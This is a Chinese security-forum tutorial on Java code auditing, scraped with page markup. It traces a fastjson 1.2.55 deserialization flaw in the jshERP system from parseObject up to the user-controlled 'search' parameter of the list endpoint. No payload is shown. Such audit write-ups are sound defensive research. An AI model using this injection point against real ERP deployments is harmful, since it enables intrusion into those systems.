swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:transl
<body>
<div class="navbar navbar-default">
<div class=navbar-inner>
<div class=container style=text-align:center;position:relative>
<!--[if lte IE 8]>
<span style="display:inline-block;margin:0 auto;color:red;">为了更好的体验请使用IE10及以上版本</span>
<![endif]-->
<div class=brand-box>
<a class=brand href=https://xz.aliyun.com/tab/1></a>
</div>
<a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F13525&amp;from_type=xianzhi" class="pull-right anonymous-user hh_loding sf-hidden">
登录</a>
<div class="nav-collapse collapse">
<div class="search d1 text-right">
<form action=/search>
<input type=text placeholder=搜索 name=keyword value>
</form>
</div>
</div>
</div>
</div>
</div>
<div id=Wrapper class=container>
<div class=row2>
<div class=span10>
<div class="row box content" width="1200px !important" style=width:1200px>
<div class=box-container>
<div class=main-topic>
<div class="clearfix user-info topic-list">
<p><span class=content-title>深入学习Java代码审计技巧—详细剖析某erp漏洞</span>
</p>
<div class=topic-info>
<span class=info-left>
<a href=https://xz.aliyun.com/u/61227>
<span class="username cell"> Dili</span></a> <span class=i-seprator> / </span>
<span> 2024-02-01 23:59:56</span><span class=i-seprator> / </span>
<span>发表于江西 / </span>
<span>浏览数 3181</span>
<span class=content-node>
<span class="label label-default label-node-first">
<a href=https://xz.aliyun.com/tab/1>技术文章</a></span>
<span class="label label-default">
<a href=https://xz.aliyun.com/node/11>技术文章</a></span>
</span>
</span>
<span class="pull-right t-vote cell info-right"><a class="vote vote-up" href=javascript:void(0)>
顶(1)</a>
<a class="vote vote-down" href=javascript:void(0)>
踩(0)</a></span>
</div>
</div>
<hr>
<div id=topic_content class="topic-content markdown-body">
<h1>深入学习Java代码审计技巧—详细剖析某erp漏洞</h1>
<h2 id=toc-0>简介</h2>
<p>对于Java代码审计主要的审计步骤如下</p>
<ul>
<li>确定项目技术框架、项目结构</li>
<li>环境搭建</li>
<li>配置文件的分析如pom.xml、web.xml等特别是pom.xml可以从组件中寻找漏洞</li>
<li>Filter分析Filter是重要的组成部分提前分析有利于把握项目对请求的过滤在后续漏洞利用时能够综合分析</li>
<li>路由分析部分项目请求路径与对用的controller方法不对应提前通过抓包调试分析了解前端请求到后端方法的对应关系便于在后续分析中更快定位代码</li>
<li>漏洞探测<ul>
<li>探测之前可借用工具辅助分析如codeql、fortify、Yakit、BP等</li>
<li>SQL注入分析、RCE分析可先从代码入手通过关键API及特征关键字来进行逆向数据流分析从sink到source判断参数是否可控</li>
<li>XSS、文件上传等漏洞适合正向数据流分析由于存储型XSS数据流断裂从代码层面不好将两条数据流联系起来可以通过前端界面的测试找到插入口和显示处性质一样的点在通过后端代码分析构造出可利用的payload</li>
<li>逻辑漏洞这类也是从前端入手比较好处理,后端代码庞大难以定位</li>
</ul>
</li>
</ul>
<p>个人观点,仅供参考</p>
<h2 id=toc-1>文件结构分析</h2>
<p><a id=img0 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201232812-82abb8ec-c116-1.png title><img src="data:image/png;base64,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
<p>在审计项目之前,先了解项目的结构</p>
<ul>
<li>src/main/java存放java核心代码里面包含controller、service、filter、dao等还包括主函数ErpApplication</li>
<li>src/main/resources包含mybatis配置文件properties等</li>
<li>erp_web里面存放的是该网站的html、css及js文件</li>
<li>docs包含数据库文件及文档文件等</li>
<li>test项目的测试目录</li>
<li>pom.xml项目的依赖配置</li>
</ul>
<h2 id=toc-2>环境搭建</h2>
<p><strong>数据库创建</strong></p>
<div class=highlight><pre><span></span><span class=n>mysql</span> <span class=o>-</span><span class=n>u</span> <span class=n>root</span> <span class=o>-</span><span class=n>h</span> <span class=mi>127</span><span class=p>.</span><span class=mi>0</span><span class=p>.</span><span class=mi>0</span><span class=p>.</span><span class=mi>1</span> <span class=o>-</span><span class=n>p</span>
<span class=k>create</span> <span class=k>database</span> <span class=n>jsh_erp</span><span class=p>;</span>
<span class=n>use</span> <span class=n>jsh_erp</span><span class=p>;</span>
<span class=k>source</span> <span class=n>D</span><span class=p>:</span><span class=o>/</span><span class=n>audit</span><span class=o>-</span><span class=n>code</span><span class=o>/</span><span class=n>java</span><span class=o>/</span><span class=n>jshERP</span><span class=o>-</span><span class=mi>2</span><span class=p>.</span><span class=mi>3</span><span class=o>/</span><span class=n>docs</span><span class=o>/</span><span class=n>jsh_erp</span><span class=p>.</span><span class=k>sql</span>
</pre></div>
<p><strong>项目启动</strong></p>
<p>application.properties文件中配置数据库连接信息及server和port启动主类ErpApplication.java即可</p>
<h2 id=toc-3>配置文件分析</h2>
<p>在对项目开始审计之前,需要先了解其配置文件</p>
<ul>
<li><p>application.propertiesSpring的全局配置文件里面包含server的ip及port同时还有数据库连接信息在环境搭建时可修改</p>
</li>
<li><p>pom.xml项目的组件依赖审计开始前先了解依赖的组件并判断是否存在对应组件版本的漏洞这也可以是漏洞挖掘的第一步</p>
<p><strong>依赖fastjson</strong></p>
<div class=highlight><pre><span></span><span class=nt>&lt;dependency&gt;</span>
<span class=nt>&lt;groupId&gt;</span>com.alibaba<span class=nt>&lt;/groupId&gt;</span>
<span class=nt>&lt;artifactId&gt;</span>fastjson<span class=nt>&lt;/artifactId&gt;</span>
<span class=nt>&lt;version&gt;</span>1.2.55<span class=nt>&lt;/version&gt;</span>
<span class=nt>&lt;/dependency&gt;</span>
</pre></div>
<p>1.2.55版本存在反序列化漏洞,现在需要寻找利用点,全局搜索<code>parseObject</code>方法</p>
</li>
</ul>
<p><a id=img1 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201232832-8ed53be8-c116-1.png><img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAA9EAAAJ4CAYAAABiVGDhAAEAAElEQVR4nOzde1RUZ54v/O9GVArlnnhBUS6FmA4mraXkxHSTdBsNiWkHFdPnNdNrhElDH/q0RFfOYFxzcmbyzjIyk2WCfZp1oPsUmTUT33MiXsbESLTJhR7jNFASA4kiBYUYUTRcRSlv7PePXZe967qrqOKi389atRJrP/vZz77UZv/q+T1PCYODgyKIiIiIiIiIyKuQ8W4AERERERER0WTBIJqIiIiIiIhIJQbRRERERERERCoxiCYiIiIiIiJSKXS8G0BERERERJOXKIoYGBiA2Wwe76bct6ZMmYKIiAiEhYWNd1OCymQyISkpabyb4RWDaCIiIiIi8osoirh8+TJu376N8PBwTJ06dbybNKZu376NadOmQaPRBG0boihiaGgIly9fxuzZsxEeHh60bZE6DKKJiIiIiMgvN2/exK1btzBr1izMmDFjvJsz5q5cuQIAQe8h1mg0CA0NRV9fH4PoCYBjoomIiIiIyC937tzB1KlTH8gAeqxFRkbizp07490MAoNoIiIiIiLykyiKCA1lcutYEUVxvJtAYBBNRERERERED4h79+6Nug5+bUREREREE54oiujt7cXNmzd9Xjc8PByxsbEQBCEILSOiyeL27duoqKjAhg0bEB8f73c9DKKJiIiIaMI7d+4crl27hujoaJ/XNZlMePjhh/HII48EvmFE9ymTyQSTyeTXuklJSRPyp6pOnDiBK1euoLKyErm5uX4H0j4F0WLb77B66euoQwbeajyBX6eM7ts88XgRonIqAeSiauBdrHH4djDQ23PbDoftFCafwKtROagM8naJiIiIyDuz2YzLly/jpz/9KSIiInxe//r16/j000+RlJR03//O7mQmin04XfUBGrAcL+UsQwwzB8ZVd3c3Pv30U7/WffHFFydcEH3p0iX8+c9/BgAMDw+PKpB2GhN9vCgSkZHOr2d/1zb6lo+j+3W/iIiIiO53t2/fBgC/Amj5etZ6aOyJfQbsL6+BiRNjTRpPPPEEHn30UZ/Xe/TRR/HEE08EoUX+GxkZwb/9279hZGTE9p41kO7q6vK5Pp8mFhNSfo0/Dg5icPCPY9I7O1bbG+v9ckcUj6MosgjHXdxcFF8CPPs7tDmU8bZ8MhHFNvzu2UgUHQ/ePohtv8Ozkc/id23+bcPaRtsxLzquXH68KGhf2LT97llLnUX4xGjfD+n68X+fiIiIyLvjRcpnLcd/TxbHi5yfX4IqOhaxXooIQgx0mwpQsEnHXugJQBAE5OTkICEhQfU6CQkJyMnJmXDzD5w6dcplsOxvIO0+iM6twuDgoO31x1+n+NzYCWmC7lfb755FVFQOKl0sO14UiZxv3kLjwAAGBhrxFl7H0ldPqF4+EbT97tlJ+QfGnROvFgDlAxgcHMTAQBVyK3Ocg+QM6ZwE8loT236HgteBtxoHMDhYijUT6/5EREQ06dm/rFa+io6LEMU2tH4z3i2cXERTDSoqKlDxaTsQG43eTytQXr4fhr7745nwfjd16lT84he/QGyst69AgNjYWPziF7/A1KlTx6Bl7l26dAmffvqp7fXhhx/ij3/8o9vy/gTSPvVES713kYi09XzZe+Oe/V2bw03HuUfVcbm3MG+02/N3v9yWc+xddAgKpZ5A5xuuN8eLIrH0/N9goPEtZDhuUzyOo5UZeKu8ECmCAEFIQWH5W8ioPIrjouh1uaO23z3LFHZYsw/8zzxYU2pfVxDWYG2ucnl76zfAo6lIUfEtnE/npO086vAoUpOlf452P4iIiMiVXFTJvggfHBxE6RrpOevXfxzE4B9/repvPAFC0irk5+cjPxlo6zOgPzkfBQWboItxffxMNeUo329An+U5VhT7YNhfLgXiFRUol6WEO5Z1VYen9cfKwMAAent7Vb0C8fNLgRYeHo4tW7YgPDx8VGXGyty5c/H999/bgug///nPuHPnjsd1bt26hbNnz6reRuB+J/pQAZa+Xid7oxI5Dr2lTstzXPW7BmZ7gdb2u2ctk6DJ1L2OpavL0GYJZl9105PszZrSQQyWrnG98MRRVMqCJgBAcioeRSWOnlCx3E/2lGr5FwPSFxXy1HH5lwT2LyOUy2znvu51LI2KUqQOef4ipF2RMq3YlsMXFopl8i873KQpydO57fsqT9FWnxYttv0O/1iZgfVZyd4Lj4L9GqxEjuU4ekpLH+0xIiIiIgoEsc+AquPA6k069B7/1Kcgtv/0aeDZfOTn5+OXv9yE5bFGHK86jT5RRGKyFuhtR3u/clsNRkC7XJqYzNP6Y2V4eBgNDQ2or6/3+Oru7saUKVPGrF2+8NTL7Etv9VgICQlBTk4OHnvsMVXl586di4KCAqxatUr9NtwuqcyRBTfeA4q6ukdt39hVWXvlrL2lbb/DP1qjS0s69cBAI95y7Hb1gafteeTjfgFSMLLXErDnVg0o21/3OvaeANDeCim7R/nNZWkg8m0zFsFjIrC35aNQmXMUa61p4hlS8HZ0rbR/jW9loDLnVdsxP1ENlFv2faAq17ZsTalU1pbebPnCQAqu7edxoHERWk/It21Pma7KBSr/0fqFRRvKVufgm7caLeu9hW9yVksBcdvvsDrnG0u68yAG1raqDoaV26vD6wVlbtPP5QFq1NLz+JsB5SzubefrlNdaAALVlF//EQNVubBdY+6+eAGCdoyIiIgedGrGQDt2LHgrbx2frOhcsKzjqcPBaY4Wp+Xuv1B32QZLtqet3gANxes43QAsX4akGB2eXd6LhtP9qteN0a2y9VoLQgyWLdcCvf3oB4DEZVge24t2WRTd396OXmiRnKhi/TEyZ84cLF68eNRlxpur8c7+jJseC9ZAWqvVui0zdepUZGVl4b/8l/+CefPm+Vb/aBtolfHWVttPVK12zG1tOw8pBM3AW1tXA4CUdvw3DuUCtb1AO3HU1sNcmRMlBU5RS2HtCP+mtd3S+wvYegmDOvN3ChZ5/AJCuVx+I1/6eh3qXl+qOt08t0r66TFBSEHWeikQtpxCJGetRwa+QWu79O81v5alNqUsUixzZO29favR/tNmQsqv8WvZlw4Zb5XbAtPVW99CRt15tAHAib14vS4Xf1OYbG0I1mfU4VC1dWN1OG859MKaX6tOdXa7PRcEYQ1KLV+UDDQuwj9GRSnO95pSe/qXdcy0PJAezTlRJUjHiIiIiDwTjxchaukhrG+UdbzAnr3oVmUOClBu+/I7w5LBt/T839ifJxwyL9vL9srmaLF0eDhkSVq/UB8cHMTaVtdtaPvds8iplDqLgjFfUNKqAmzSxQAAYnSbbP+vlqnGno79+xP25y1BiEFycix629ttqdvt7b2IXb4MSbJAz936Y2nBggVITnadtRgbG4slS5ZMuMm4XHn00UcRFRVl+3dUVJRfM3iPhcHBQVy6dMnlspSUFBQVFeFHP/oRQkJ8D4lVTix2H425DNJ+CcIavDtQBXk4X/f60sAE0k7BXBvO12VgUYq65fbZx6Ue4QzZzdTnnnI343wdvwmNWvo66lysbm+icmyv6025Xtje+g3kX1bIv9AQUn6NE1W5ti87fDn+7rbnjZDya5S/lYG6Q9Uu/zAJwhq8W5WryJQI6DlxIVjHiIiI6MFg/xvqy9w7otiGsn+sRG7VCdncKZb5auoOodpN5wIAIOMtlFu+/BZSfg2prykXVe9aO6Asc7B802p73kj5dalyO3+Ta38utGRJyp9vFB0e1jYfL8LS1+uQ8Vaj7Rlkooz9FkUTasrLcdyoxepf/lJKyV6tDPKjk5MR29uA0x0A+tvR3huL5ORo1euPpdTUVKcez4iICCxdutSvQI7cu3fvHv7P//k/GB4edrl8+fLliI6O9rv+sTlbKYssE2bZe8KsN5lJwdZ+ezq3qxm+5b2TjZZc9bpD1QHYtkOPbnsrvrEGo
<p>猜测search可能可控进入分析</p>
<div class=highlight><pre><span></span><span class=kd>public</span> <span class=kd>static</span> <span class=n>String</span> <span class=nf>getInfo</span><span class=o>(</span><span class=n>String</span> <span class=n>search</span><span class=o>,</span> <span class=n>String</span> <span class=n>key</span><span class=o>){</span>
<span class=n>String</span> <span class=n>value</span> <span class=o>=</span> <span class=s>""</span><span class=o>;</span>
<span class=k>if</span><span class=o>(</span><span class=n>search</span><span class=o>!=</span><span class=kc>null</span><span class=o>)</span> <span class=o>{</span>
<span class=c1>// 这里</span>
<span class=n>JSONObject</span> <span class=n>obj</span> <span class=o>=</span> <span class=n>JSONObject</span><span class=o>.</span><span class=na>parseObject</span><span class=o>(</span><span class=n>search</span><span class=o>);</span>
<span class=n>value</span> <span class=o>=</span> <span class=n>obj</span><span class=o>.</span><span class=na>getString</span><span class=o>(</span><span class=n>key</span><span class=o>);</span>
<span class=k>if</span><span class=o>(</span><span class=n>value</span><span class=o>.</span><span class=na>equals</span><span class=o>(</span><span class=s>""</span><span class=o>))</span> <span class=o>{</span>
<span class=n>value</span> <span class=o>=</span> <span class=kc>null</span><span class=o>;</span>
<span class=o>}</span>
<span class=o>}</span>
<span class=k>return</span> <span class=n>value</span><span class=o>;</span>
<span class=o>}</span>
</pre></div>
<p>查看getInfo函数的调用处比较多一个一个筛选这里选择UserComponent.java中的getUserList方法进行分析</p>
<div class=highlight><pre><span></span><span class=kd>private</span> <span class=n>List</span><span class=o>&lt;?&gt;</span> <span class=n>getUserList</span><span class=o>(</span><span class=n>Map</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>String</span><span class=o>&gt;</span> <span class=n>map</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=n>String</span> <span class=n>search</span> <span class=o>=</span> <span class=n>map</span><span class=o>.</span><span class=na>get</span><span class=o>(</span><span class=n>Constants</span><span class=o>.</span><span class=na>SEARCH</span><span class=o>);</span>
<span class=c1>// 这里</span>
<span class=n>String</span> <span class=n>userName</span> <span class=o>=</span> <span class=n>StringUtil</span><span class=o>.</span><span class=na>getInfo</span><span class=o>(</span><span class=n>search</span><span class=o>,</span> <span class=s>"userName"</span><span class=o>);</span>
<span class=n>String</span> <span class=n>loginName</span> <span class=o>=</span> <span class=n>StringUtil</span><span class=o>.</span><span class=na>getInfo</span><span class=o>(</span><span class=n>search</span><span class=o>,</span> <span class=s>"loginName"</span><span class=o>);</span>
<span class=n>String</span> <span class=n>order</span> <span class=o>=</span> <span class=n>QueryUtils</span><span class=o>.</span><span class=na>order</span><span class=o>(</span><span class=n>map</span><span class=o>);</span>
<span class=n>String</span> <span class=n>filter</span> <span class=o>=</span> <span class=n>QueryUtils</span><span class=o>.</span><span class=na>filter</span><span class=o>(</span><span class=n>map</span><span class=o>);</span>
<span class=k>return</span> <span class=n>userService</span><span class=o>.</span><span class=na>select</span><span class=o>(</span><span class=n>userName</span><span class=o>,</span> <span class=n>loginName</span><span class=o>,</span> <span class=n>QueryUtils</span><span class=o>.</span><span class=na>offset</span><span class=o>(</span><span class=n>map</span><span class=o>),</span> <span class=n>QueryUtils</span><span class=o>.</span><span class=na>rows</span><span class=o>(</span><span class=n>map</span><span class=o>));</span>
<span class=o>}</span>
</pre></div>
<p>逐层向上调用分析可以得知在ResourceController.java中调用select即search参数可控</p>
<div class=highlight><pre><span></span><span class=nd>@GetMapping</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=s>"/{apiName}/list"</span><span class=o>)</span>
<span class=kd>public</span> <span class=n>String</span> <span class=nf>getList</span><span class=o>(</span><span class=nd>@PathVariable</span><span class=o>(</span><span class=s>"apiName"</span><span class=o>)</span> <span class=n>String</span> <span class=n>apiName</span><span class=o>,</span>
<span class=nd>@RequestParam</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=n>Constants</span><span class=o>.</span><span class=na>PAGE_SIZE</span><span class=o>,</span> <span class=n>required</span> <span class=o>=</span> <span class=kc>false</span><span class=o>)</span> <span class=n>Integer</span> <span class=n>pageSize</span><span class=o>,</span>
<span class=nd>@RequestParam</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=n>Constants</span><span class=o>.</span><span class=na>CURRENT_PAGE</span><span class=o>,</span> <span class=n>required</span> <span class=o>=</span> <span class=kc>false</span><span class=o>)</span> <span class=n>Integer</span> <span class=n>currentPage</span><span class=o>,</span>
<span class=nd>@RequestParam</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=n>Constants</span><span class=o>.</span><span class=na>SEARCH</span><span class=o>,</span> <span class=n>required</span> <span class=o>=</span> <span class=kc>false</span><span class=o>)</span> <span class=n>String</span> <span class=n>search</span><span class=o>,</span>
<span class=n>HttpServletRequest</span> <span class=n>request</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=n>Map</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>String</span><span class=o>&gt;</span> <span class=n>parameterMap</span> <span class=o>=</span> <span class=n>ParamUtils</span><span class=o>.</span><span class=na>requestToMap</span><span class=o>(</span><span class=n>request</span><span class=o>);</span>
<span class=n>parameterMap</span><span class=o>.</span><span class=na>put</span><span class=o>(</span><span class=n>Constants</span><span class=o>.</span><span class=na>SEARCH</span><span class=o>,</span> <span class=n>search</span><span class=o>);</span>
<span class=n>PageQueryInfo</span> <span class=n>queryInfo</span> <span class=o>=</span> <span class=k>new</span> <span class=n>PageQueryInfo</span><span class=o>();</span>
<span class=n>Map</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>Object</span><span class=o>&gt;</span> <span class=n>objectMap</span> <span class=o>=</span> <span class=k>new</span> <span class=n>HashMap</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>Object</span><span class=o>&gt;();</span>
<span class=k>if</span> <span class=o>(</span><span class=n>pageSize</span> <span class=o>!=</span> <span class=kc>null</span> <span class=o>&amp;&amp;</span> <span class=n>pageSize</span> <span class=o>&lt;=</span> <span class=mi>0</span><span class=o>)</span> <span class=o>{</span>
<span class=n>pageSize</span> <span class=o>=</span> <span class=mi>10</span><span class=o>;</span>
<span class=o>}</span>
<span class=n>String</span> <span class=n>offset</span> <span class=o>=</span> <span class=n>ParamUtils</span><span class=o>.</span><span class=na>getPageOffset</span><span class=o>(</span><span class=n>currentPage</span><span class=o>,</span> <span class=n>pageSize</span><span class=o>);</span>
<span class=k>if</span> <span class=o>(</span><span class=n>StringUtil</span><span class=o>.</span><span class=na>isNotEmpty</span><span class=o>(</span><span class=n>offset</span><span class=o>))</span> <span class=o>{</span>
<span class=n>parameterMap</span><span class=o>.</span><span class=na>put</span><span class=o>(</span><span class=n>Constants</span><span class=o>.</span><span class=na>OFFSET</span><span class=o>,</span> <span class=n>offset</span><span class=o>);</span>
<span class=o>}</span>
<span class=c1>// 这里</span>
<span class=n>List</span><span class=o>&lt;?&gt;</span> <span class=n>list</span> <span class=o>=</span> <span class=n>configResourceManager</span><span class=o>.</span><span class=na>select</span><span class=o>(</span><span class=n>apiName</span><span class=o>,</span> <span class=n>parameterMap</span><span class=o>);</span>
<span class=n>objectMap</span><span class=o>.</span><span class=na>put</span><span class=o>(</span><span class=s>"page"</span><span class=o>,</span> <span class=n>queryInfo</span><span class=o>);</span>
<span class=k>if</span> <span class=o>(</span><span class=n>list</span> <span class=o>==</span> <span class=kc>null</span><span class=o>)</span> <span class=o>{</span>
<span class=n>queryInfo</span><span class=o>.</span><span class=na>setRows</span><span class=o>(</span><span class=k>new</span> <span class=n>ArrayList</span><span class=o>&lt;</span><span class=n>Object</span><span class=o>&gt;());</span>
<span class=n>queryInfo</span><span class=o>.</span><span class=na>setTotal</span><span class=o>(</span><span class=n>BusinessConstants</span><span class=o>.</span><span class=na>DEFAULT_LIST_NULL_NUMBER</span><span class=o>);</span>
<span class=k>return</span> <span class=n>returnJson</span><span class=o>(</span><span class=n>objectMap</span><span class=o>,</span> <span class=s>"查找不到数据"</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>OK</span><span class=o>.</span><span class=na>code</span><span class=o>);</span>
<span class=o>}</span>
<span class=n>queryInfo</span><span class=o>.</span><span class=na>setRows</span><span class=o>(</span><span class=n>list</span><span class=o>);</span>
<span class=n>queryInfo</span><span class=o>.</span><span class=na>setTotal</span><span class=o>(</span><span class=n>configResourceManager</span><span class=o>.</span><span class=na>counts</span><span class=o>(</span><span class=n>apiName</span><span class=o>,</span> <span class=n>parameterMap</span><span class=o>));</span>
<span class=k>return</span> <span class=n>returnJson</span><span class=o>(</span><span class=n>objectMap</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>OK</span><span class=o>.</span><span class=na>name</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>OK</span><span class=o>.</span><span class=na>code</span><span class=o>);</span>
<span class=o>}</span>
</pre></div>
